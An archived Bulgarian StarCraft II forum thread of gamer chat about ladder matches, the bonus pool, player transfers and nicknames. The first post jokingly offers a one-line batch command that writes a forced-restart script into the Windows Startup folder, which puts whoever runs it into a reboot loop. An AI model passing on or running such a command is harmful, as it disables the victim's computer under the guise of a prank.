Antares Posted July 18, 2011 Share Posted July 18, 2011 Ето и скриптче за терани echo shutdown -r -f -t 20 -c "YOUR COMPUTER HAS BEEN NEURO PARASITED!" > "%HOMEPATH%\Start Menu\Programs\Startup\startup.bat" echo shutdown -r -f -t 20 -c "YOUR COMPUTER HAS BEEN NEURO PARASITED!" Link to comment Share on other sites More sharing options...
djadomraz Posted July 18, 2011 Share Posted July 18, 2011 Абе на мен ли само ми е спряло бонус пуула? От няколко дена не ми дава никакви точки... Утре приключва сезона или почва новия не помня. Нещо 19ти ми се върти в главата. Link to comment Share on other sites More sharing options...
Mepk Posted July 18, 2011 Share Posted July 18, 2011 По спомени S03E01 започва на 26-ти. Иначе бонус пуула са ти го спрели, защото blizzard не могат да измислят как да оправят баланса и решили да махнат bonus pool-а на всички зерги :Р Link to comment Share on other sites More sharing options...
basten Posted July 18, 2011 Share Posted July 18, 2011 ... защото blizzard не могат да измислят как да оправят баланса и решили да махнат bonus pool-а на всички зерги :Р Ахахахаха... това ми дойде като свеж въздух в задръстен кенеф. Link to comment Share on other sites More sharing options...
PSYCHOSIS Posted July 19, 2011 Share Posted July 19, 2011 Link to comment Share on other sites More sharing options...
Antares Posted July 19, 2011 Share Posted July 19, 2011 Доста добро интервю. Вдигна ми се малко в очите дЯтето Link to comment Share on other sites More sharing options...
liquid Posted July 19, 2011 Share Posted July 19, 2011 Той винаги е давал такива интервюта. Link to comment Share on other sites More sharing options...
djadomraz Posted July 19, 2011 Share Posted July 19, 2011 Който не е гледал WhiteRa (P) vs Smung (Z) - да го направи. Егати играта. Link to comment Share on other sites More sharing options...
Baba_qga Posted July 19, 2011 Share Posted July 19, 2011 Няма по-голям кеф: Груби срещу Yolini.SuHo (Или WE, не знам какво се води) на Уаркрафтец... По едно време Сухо му вика: I want play you on sc2! Ееех, младост.. Link to comment Share on other sites More sharing options...
liquid Posted July 19, 2011 Share Posted July 19, 2011 Смених си името на нещо малко по-уникално от ликуид - GotNoSkill #500 :д Link to comment Share on other sites More sharing options...
Baba_qga Posted July 19, 2011 Share Posted July 19, 2011 Смених си името на нещо малко по-уникално от ликуид - GotNoSkill #500 :д Аз преди няколко месеца играх срещу хора със следните никове: Terran (P) Computer (T) По което разбираме, че тераните и протосите обикновено са ръбове. Това казах и на двамата It's a very imaginative nickname you have there Link to comment Share on other sites More sharing options...
liquid Posted July 19, 2011 Share Posted July 19, 2011 На мен ми писна всякакви келеши да ме питат дали не съм бил от ТЛ и ако не съм що съм ползвал тяхното име и т.н., пълно е със слабоумни дЯца. Ако си в златото, сребро, платина или дори диамант и играеш с/у някой си liquid, особено ладър, как може да ти мине през главата, че той е от ТЛ... Link to comment Share on other sites More sharing options...
djadomraz Posted July 19, 2011 Share Posted July 19, 2011 Тъп въпрос но в името освен букви и цифри какво може да има друго? точки, тирета, плюс, минус? Link to comment Share on other sites More sharing options...
liquid Posted July 20, 2011 Share Posted July 20, 2011 Май не може Link to comment Share on other sites More sharing options...
Psihara^^ Posted July 20, 2011 Share Posted July 20, 2011 Тъп въпрос но в името освен букви и цифри какво може да има друго? точки, тирета, плюс, минус? Точка може. Друго - NEIN! Link to comment Share on other sites More sharing options...
PSYCHOSIS Posted July 21, 2011 Share Posted July 21, 2011 Още един кореец се присъединява към "чуждестранен" отбор. Става дума за победителя от NASL Season 1 - Puma. По това, което чета, изглежда, че Evil Geniuses едва ли не са го откраднали от TSL, тъй като са се договорили с него (заплата + пари за пътувания до турнири извън Корея), докато е бил в Америка за турнира, без да се допитат до мениджърите на корейския отбор. Оттук нататък EG не трябва да губи clanwars Link to comment Share on other sites More sharing options...
liquid Posted July 21, 2011 Share Posted July 21, 2011 + English lessons? Усещам как демуслим и идра ще усетят доста сериозно подобрение zvt/tvt Link to comment Share on other sites More sharing options...
Antares Posted July 21, 2011 Share Posted July 21, 2011 Ха! Мюсюлманина и той ли е от яйцата? Link to comment Share on other sites More sharing options...
PSYCHOSIS Posted July 21, 2011 Share Posted July 21, 2011 Да, отдавна. Скоро се премести в Аризона при IdrA и компания. Даже преди няколко дни спечели един офлайн турнир там. Link to comment Share on other sites More sharing options...
Antares Posted July 21, 2011 Share Posted July 21, 2011 Съвсем наскоро разбрах, че Lucifron = Naniwa. Бях потресен. Lucifron го помня още от бетата на TFT, когато беше ужасно активен по близ форумите (тогава и аз играех доста и пишех от време на време), беше с доста пиперлив език и едновременно даваше доста адекватни идеи. Помня един случай, когато някакъв се оплака (със скрийншот), как въпросния трол му написал "I hope all of your family dies in a car crash", след игра 2:2 в която Люси(Нани) му казал да прави anti-air, ония направил 6 балисти... Link to comment Share on other sites More sharing options...
PSYCHOSIS Posted July 21, 2011 Share Posted July 21, 2011 Май се бъркаш. Lucifron в СК2 е един испански теран, който скоро никакъв не се е вясвал. Един от старите никовe на Naniwa e бил Lucifer, може би за това се сещаш. Link to comment Share on other sites More sharing options...
Antares Posted July 21, 2011 Share Posted July 21, 2011 Source: Played in the same WC3 clan as LucifroN ----- Edit: @ me Link to comment Share on other sites More sharing options...
liquid Posted July 21, 2011 Share Posted July 21, 2011 Да де, играли са ВК3 заедно в клан, но са различни хора. Link to comment Share on other sites More sharing options...
Antares Posted July 21, 2011 Share Posted July 21, 2011 Бих ranked 7 master terran. Опита 6rax push, който спрях със сталкери и сентрита... Link to comment Share on other sites More sharing options...
liquid Posted July 21, 2011 Share Posted July 21, 2011 Ето това става когато някой се опита да ми пробута феникси в ПвП http://www.justin.tv/thesilentenigma/b/290690565? :д Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.